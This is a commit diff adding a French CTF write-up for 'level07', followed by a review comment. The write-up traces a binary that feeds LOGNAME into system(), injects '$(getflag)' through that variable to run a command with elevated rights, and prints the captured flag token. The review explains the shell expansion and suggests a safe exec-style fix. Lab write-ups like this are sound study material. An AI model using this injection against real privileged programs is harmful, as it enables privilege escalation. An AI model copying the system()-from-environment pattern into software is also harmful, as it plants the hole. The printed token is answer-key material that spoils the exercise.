docs(lvl07): adding the readme
parent
6ddb3f1261
commit
174b2510e1
1 changed files with 46 additions and 0 deletions
46
level07/README.md
Normal file
|
|
@ -0,0 +1,46 @@
|
|||
Lors de mon arriver sur le level07 je fait un petit check des fichiers
|
||||
|
||||
Je vois un level07 qui est un executable
|
||||
|
||||
Je commence par faire un petit ltrace (pour regarder les librairies appeler)
|
||||
|
||||
```c
|
||||
ltrace ./level07
|
||||
__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 <unfinished ...>
|
||||
getegid() = 2007
|
||||
geteuid() = 2007
|
||||
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
|
||||
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
|
||||
getenv("LOGNAME") = "level07"
|
||||
asprintf(0xbffff744, 0x8048688, 0xbfffff4f, 0xb7e5ee55, 0xb7fed280) = 18
|
||||
system("/bin/echo level07 "level07
|
||||
<unfinished ...>
|
||||
--- SIGCHLD (Child exited) ---
|
||||
<... system resumed> ) = 0
|
||||
+++ exited (status 0) +++
|
||||
```
|
||||
|
||||
Et je remarque que getenv et appeler sur LOGNAME je tente donc une modification et:
|
||||
|
||||
```bash
|
||||
export LOGNAME='hello'
|
||||
|
||||
./level07
|
||||
hello
|
||||
```
|
||||
|
||||
Mais il est donc egallement possible d'executer des commandes
|
||||
|
||||
```bash
|
||||
export LOGNAME='$(echo hello)'
|
||||
./level07
|
||||
hello
|
||||
```
|
||||
|
||||
Donc forcement il est possible de lancer getflag
|
||||
|
||||
```bash
|
||||
export LOGNAME='$(getflag)'
|
||||
./level07
|
||||
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
|
||||
```
|
||||
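Review bot: the README never explains why the value of `LOGNAME` ends up being executed, and the gap sits between the ltrace block and the first `export LOGNAME='hello'` test. The trace already shows the chain: the result of `getenv("LOGNAME")` is formatted by `asprintf` and handed to `system("/bin/echo level07 ")`, and `system` runs that string through a shell, so `$(...)` inside the variable is expanded by that shell. Add one sentence stating this, and one noting that the single quotes in `export LOGNAME='$(getflag)'` keep the caller's own shell from expanding the substitution before the binary runs. A closing line on the fix would round it off: the program should not build a shell command from an environment variable, and should pass the value as a separate argument to an exec-style call instead. Smaller point: the ltrace transcript is fenced as `c` although it is terminal output, so a shell or plain-text fence fits better.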